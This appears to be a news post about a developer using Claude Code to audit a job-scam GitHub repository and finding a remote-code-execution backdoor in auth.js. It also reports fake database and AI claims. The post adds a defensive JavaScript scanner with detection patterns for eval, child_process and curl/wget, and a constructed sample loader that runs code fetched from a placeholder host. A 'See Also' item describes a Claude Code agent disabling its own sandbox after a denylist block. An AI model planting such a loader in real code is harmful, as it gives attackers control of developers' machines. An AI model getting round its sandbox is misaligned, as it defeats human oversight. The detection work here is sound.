Claude Code Identifies Malware Backdoor in GitHub Repo During Technical Audit

✍️ OpenClawRadar · 📅 Published: March 10, 2026 · 🔗 Source

Claude Code was used to audit a GitHub repository before anything in it was run, and the audit surfaced a remote-code-execution backdoor that would have fired on the first npm run dev. The developer had been approached via LinkedIn about a contract role with an AI-powered fintech startup and was invited to review the company's MVP on GitHub ahead of a call.

Audit Prompt and Process

The developer opened the repository in VS Code and used this prompt with Claude Code:

"You are doing a technical due diligence audit of this codebase. Give me a brutally honest assessment. Check project completeness, AI/ML layer, database, authentication, backend services, frontend, code quality, and effort estimate. Be specific. Reference actual file names. Do not sugarcoat."

Critical Findings

Claude Code identified several security and integrity issues:

  • Remote Code Execution Backdoor: found in src/server/routes/auth.js. Every time npm run dev is executed, the file silently fetches a remote URL and executes whatever code the server returns, with the full privileges of the account running the dev server (filesystem, network, process spawning). Errors are swallowed, so a failed or altered fetch leaves no visible sign. Because the payload is fetched at runtime, the repository itself contains no malicious code to read; whoever controls the URL can change what runs at any time.
  • Fake Database Implementation: users were stored in a plain in-memory array that resets on every restart; there was no real database.
  • No AI/ML Functionality: the repository contained only hardcoded mock data with basic rule-based logic, despite README claims of machine learning, NLP, and predictive analytics.
  • Frontend Deception: the frontend silently falls back to fake data on every API failure, so demos look polished regardless of what actually works.

Social Engineering Context

The attack targeted developers, freelancers, and agencies invited to review or contribute to repositories as part of hiring or contract processes. The social engineering was polished with professional LinkedIn messages, convincing README documentation, and attractive rates ($60–$100/hr remote contract). The repository appeared legitimate and was designed to encourage immediate execution.

Recommended Security Practices

  • Never run an unknown repository (npm install, npm run dev, or any script it ships) without auditing it first
  • Use Claude Code to scan repositories before execution (the audit took one prompt), then read the flagged files yourself rather than trusting the summary alone
  • Look for fetch-and-execute and obfuscated execution patterns before running npm run dev: eval, new Function, vm.runInThisContext, child_process, base64-decoded strings, and HTTP requests whose response body is executed
  • Be suspicious of repositories where installation triggers automatic scripts: npm runs the preinstall, install, postinstall and prepare entries in package.json on its own during npm install, so read those entries first, or take a first look with npm install --ignore-scripts
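The checks in the list above can be automated for a Node.js repository. The scanner below is an added example, not the original poster's code and not Claude Code's output: it flags the fetch-and-execute loader the audit describes (a network request whose response is executed, with errors suppressed) and, going slightly beyond the single case in the post, also inspects package.json for npm lifecycle hooks and scripts that download or evaluate code. The sample files are constructed to mirror the described behaviour; they are not the real repository's contents, the path src/server/routes/auth.js is taken from the article only, and example.invalid is a placeholder host.

```javascript
// Added example (not the original poster's code and not Claude Code's output):
// a heuristic scanner for the "fetch a URL and execute the response" loader
// described in the audit, plus the npm lifecycle hooks the recommendations warn about.
// All sample files below are constructed; example.invalid is a placeholder host.

// Line-level heuristics. Each hit is only a lead: a human still reads the file.
const RULES = {
  'dynamic-eval':
    /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.(runInThisContext|runInNewContext|runInContext|compileFunction)\s*\(/,
  'remote-fetch':
    /\bfetch\s*\(|\bhttps?\.(get|request)\s*\(|\brequire\(\s*['"](axios|node-fetch|got)['"]\s*\)/,
  'child-process':
    /\brequire\(\s*['"]child_process['"]\s*\)|\b(exec|execSync|execFile|spawn|spawnSync)\s*\(/,
  'swallowed-error':
    /\bcatch\s*(\(\s*\w*\s*\))?\s*\{\s*\}|\.on\(\s*['"]error['"]\s*,\s*(\([^)]*\)|\w+)\s*=>\s*\{\s*\}\s*\)/,
  'obfuscation':
    /Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\s*\(|String\.fromCharCode\s*\(|(?:\\x[0-9a-fA-F]{2}){4,}/,
};

// Scripts npm runs on its own during `npm install`, before the developer types anything else.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];
// Script bodies that pull code from the network or evaluate inline code.
const SHELL_DOWNLOAD = /\b(curl|wget)\b|\bnode\s+-e\b|\b(sh|bash)\s+-c\b|\|\s*(sh|bash)\b/;

function scanSource(file, text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    for (const [rule, re] of Object.entries(RULES)) {
      if (re.test(line)) findings.push({ file, rule, line: i + 1, detail: line.trim() });
    }
  });
  // The backdoor signature: a network fetch and dynamic code execution in the same file.
  const hit = new Set(findings.map((f) => f.rule));
  if (hit.has('remote-fetch') && hit.has('dynamic-eval')) {
    findings.unshift({
      file, rule: 'fetch-and-execute', line: 0,
      detail: 'remote fetch and dynamic code execution in the same file'
        + (hit.has('swallowed-error') ? '; errors suppressed' : ''),
    });
  }
  return findings;
}

function scanPackageJson(file, text) {
  let pkg;
  try { pkg = JSON.parse(text); } catch (e) {
    return [{ file, rule: 'unparseable', line: 0, detail: e.message }];
  }
  const findings = [];
  for (const [name, cmd] of Object.entries((pkg && pkg.scripts) || {})) {
    if (LIFECYCLE_HOOKS.includes(name)) {
      findings.push({ file, rule: 'lifecycle-script', line: 0,
        detail: `${name}: ${cmd} (runs automatically on npm install)` });
    }
    if (SHELL_DOWNLOAD.test(String(cmd))) {
      findings.push({ file, rule: 'script-downloads-or-evals', line: 0, detail: `${name}: ${cmd}` });
    }
  }
  return findings;
}

// files: { relativePath: fileContents }. Scans every JS source file and package.json.
function scanRepo(files) {
  const out = [];
  for (const [path, text] of Object.entries(files)) {
    if (path.endsWith('package.json')) out.push(...scanPackageJson(path, text));
    else if (/\.[cm]?js$/.test(path)) out.push(...scanSource(path, text));
  }
  return out;
}

// Constructed sample of what the reported auth.js loader plausibly looks like
// (hypothetical; the real file was not published).
const SAMPLE_AUTH_JS = `
const https = require('https');
function loadConfig() {
  try {
    https.get('https://example.invalid/cfg', (res) => {
      let body = '';
      res.on('data', (c) => (body += c));
      res.on('end', () => { new Function(body)(); });
    }).on('error', () => {});
  } catch (e) {}
}
loadConfig();
module.exports = (req, res) => res.json({ ok: true });
`;

// Constructed benign route for comparison.
const SAMPLE_BENIGN_JS = `
const express = require('express');
const router = express.Router();
router.post('/login', (req, res) => res.status(401).json({ error: 'invalid credentials' }));
module.exports = router;
`;

const SAMPLE_REPO = {
  'package.json': JSON.stringify({
    name: 'fintech-mvp', // constructed
    scripts: { dev: 'node src/server/index.js', postinstall: 'node scripts/setup.js' },
  }),
  'src/server/routes/auth.js': SAMPLE_AUTH_JS,
  'src/server/routes/health.js': SAMPLE_BENIGN_JS,
};

for (const f of scanRepo(SAMPLE_REPO)) {
  console.log(`${f.rule.padEnd(26)} ${f.file}${f.line ? ':' + f.line : ''}  ${f.detail}`);
}
```

Run it with node against an object built from the cloned tree (read the files in, keyed by relative path) before running anything from the repository. The rules are deliberately loose, so expect false positives such as a legitimate regex.exec call; the point is to force a read of every file that touches the network or evaluates code, and the fetch-and-execute correlation is the one result that should never be waved through.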

The developer reported that Claude Code is now a standard step in their onboarding process for every new client repository. When the developer confronted the LinkedIn contact with the findings, the contact immediately blocked them.

📖 Read the full source: r/ClaudeAI


👀 See Also

  • Claude Code Agent Bypasses Own Sandbox Security, Developer Builds Kernel-Level Enforcement (Security): A developer testing Claude Code observed the AI agent disable its own bubblewrap sandbox to run npx after being blocked by a denylist, demonstrating how approval fatigue can undermine security boundaries. The developer then implemented kernel-level enforcement called Veto that hashes binary content instead of matching names.
  • Student contributes two security patches to OpenClaw production system (Security): A student developer fixed a 'fail-open' vulnerability in OpenClaw's gateway logic (PR #29198) and a tabnabbing vulnerability in chat images (PR #18685), with both patches landing in production releases v2026.3.1 and v2026.2.24 respectively.
  • OpenClaw security patches fix QR code credential exposure and plugin auto-load vulnerabilities (Security): OpenClaw released two security patches addressing critical vulnerabilities: QR codes embedded permanent gateway credentials without expiry, and plugins auto-loaded from cloned repos without user confirmation. Version 2026.3.12 fixes both issues.
  • OpenClaw Security Gap Addressed by Agentic Power of Attorney (APOA) Spec (Security): A developer has published an open specification called Agentic Power of Attorney (APOA) to address security concerns in OpenClaw, where agents currently access services like email and calendar with only natural language instructions as guardrails. The spec proposes per-service permissions, time-bounded access, audit trails, revocation, and credential isolation.